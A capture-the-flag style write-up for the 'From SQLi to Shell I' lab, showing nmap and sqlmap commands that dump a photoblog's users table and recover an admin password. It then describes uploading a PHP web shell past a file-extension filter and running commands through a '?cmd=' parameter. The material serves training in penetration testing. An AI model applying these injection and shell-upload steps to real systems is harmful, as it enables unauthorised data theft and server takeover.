Solution for From SQLi to Shell I

• First Part – > SQL Injection• Second Part – > Shell Upload

Emre ÖVÜNÇ Intern – İnnovera

info@emreovunc.com

FIRST PARTSQL INJECTION

First of all, I scan Vulnerable machine IP which is “192.168.1.117” by using “Nmap”. ( e.g. nmap 192.168.1.117 -Pn )

• -Pn to skip host discovery

In this case , we can see that only #22 and #80 ports are available for this machine, it means , we access “ssh” and “http” services.

Then, we visit the web site and search it (e.g. links, content of the server...) for implementation SQLInjection, XSS … etc attacks.

As you can see the last picture, “http://192.168.1.117/cat.php?id=1” is attracted the attention because of the SQL Injection findable.

Let’s check it. I add only ‘“’ at the end of the link and the result is not surprised me.

We can use “Sqlmap” without exerting too much effort ( e.g. sqlmap –url “http://192.168.1.117/cat.php?id=1%22” --dbs )

• --url to specify the address• --dbs to enumerate DBMS databases

We can see the name of the available databases from the picture. Then, my next step is that finding admin password to access the admin panel.

After that, I can find tables in a particular database.( e.g. sqlmap –url “http://192.168.1.117/cat.php?id=1%22” --tables -D photoblog )

• --tables to enumerate DBMS database tables• -D for DBMS database enumeration

Now that, I get the columns of some important table like users table. It may contain user’s name andpassword.( e.g. sqlmap –url “http://192.168.1.117/cat.php?id=1%22” --columns -T users -D photoblog )

• --columns to enumerate DBMS database table columns• -T for DBMS database table(s) to enumerate

Final part of the sql injection is getting data from the tables. ( e.g. sqlmap –url “http://192.168.1.117/cat.php?id=1%22” --dump -T users -D photoblog )

• --dump to dump DBMS database table entries• --dump-all to dump all DBMS databases tables entries

As you can see from the pictures, I obtain the admin password which is “P4ssw0rd”.

SECOND PARTSHELL UPLOAD

After a successful login, I catch attention of picture’s upload page. I think that, if I can upload a webshell from the picture upload page, I may gain authority of the server.

To do that, I write a simple PHP script (called myShell.php) to run commands and save it .

When I start to upload “myShell.php” , web page does not allow me to upload .php extensions, it does not allow “.php” file extensions to protect from this kind of attacks.

Then, my next step should be renaming it from “myShell.php” to “myShell.php.hacker”. I can add “.hacker” end of the file name.

Now, I try it with new extension.

Successfully Uploaded !

There are 2 more steps to execute my commands on the server. First step is that, I click the title which is in this case “MyShell Title” and go to the page.

After that, I view Page Source to understand where my shell is. I find it ( admin/uploads/myShell.php.hacker ) and I should go to that location.

The one of the most important part is that, I should add “?cmd=” at the end of the url.( e.g. http://192.168.1.117/admin/uploads/myShell.php.hacker?cmd= )

Another important part is that, I write my commands after the “ = “ sign. ( e.g. http://192.168.1.117/admin/uploads/myShell.php.hacker?cmd=ls )

Finally, as you can see the pictures, I run some commands on the server and I can see the result from the web page.